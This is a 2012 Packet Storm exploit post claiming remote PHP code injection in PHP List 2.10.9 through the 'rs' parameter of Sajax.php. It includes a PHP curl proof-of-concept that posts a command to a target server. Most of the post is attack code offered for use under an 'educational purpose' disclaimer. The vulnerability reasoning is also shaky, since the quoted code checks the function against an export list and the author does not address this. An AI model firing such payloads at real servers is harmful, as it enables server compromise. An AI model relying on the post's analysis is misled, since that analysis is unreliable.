PHP List 2.10.9 PHP Code Injection

2012-05-26T00:00:00
ID PACKETSTORM:113058
Type packetstorm
Reporter L3b-r1'z
Modified 2012-05-26T00:00:00

Description

                                        
                                            `# --------------------------------------- #  
# Author : L3b-r1'z  
# Title : Php List 2.10.9 Remote PHP Code Injection  
# Date : 5/25/2012  
# Email : L3br1z@Gmail.com  
# Site : Sec4Ever.com & Exploit4arab.com  
# --------------------------------------- #  
# This PoC was written for educational purpose. Use it at your own risk.  
# Author will be not responsible for any damage.  
# --------------------------------------- #  
# 1) Bug  
# 2) PoC  
# --------------------------------------- #  
# 2) Bug :  
# An attacker might execute arbitrary PHP code with this vulnerability.  
# User tainted data is embedded into a function that compiles  
# PHP code on the run and #executes it thus allowing an attacker to inject  
own PHP code that will be  
# executed. This vulnerability can lead to full server compromise.  
# Look To The File Named (Sajax.php) In Dir (admin/commonlib/lib) On Line  
(63)  
# 63. $func_name = $_POST["rs"];  
# if (! empty($_POST["rsargs"]))  
# $args = $_POST["rsargs"];  
# else  
# $args = array();  
# }  
#  
# if (! in_array($func_name, $sajax_export_list))  
# echo "-:$func_name not callable";  
# else {  
# echo "+:";  
# 74. $result = call_user_func_array($func_name, $args);  
# echo $result;  
# }  
# exit;  
# }  
# So We Have Variable Func Name With Post rs :)  
# In Above Of Code We Have $_GET['rs']; So This Is An Attacker Wan't It.  
# Look To Line (74).  
# Call_User_Func_Array($func_name, $args);  
# Attacker Can Inject In Get Paramater Or POST PHP Code.  
# --------------------------------------- #  
# 3) PoC :  
# <?php  
# $target = $argv[1];  
# $ch = curl_init();  
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
# curl_setopt($ch, CURLOPT_URL, "http://$target/Sajax.php");  
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;  
Windows NT 5.0)");  
# curl_setopt($ch, CURLOPT_POST, 1);  
# curl_setopt($ch, CURLOPT_POSTFIELDS, "rs=whoami");  
# curl_setopt($ch, CURLOPT_TIMEOUT, 3);  
# curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);  
# curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);  
# curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");  
# $buf = curl_exec ($ch);  
# curl_close($ch);  
# unset($ch);  
# echo $buf;  
# ?>  
# --------------------------------------- #  
# Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector  
, Over-X , Ked-Ans.  
# --------------------------------------- #  
`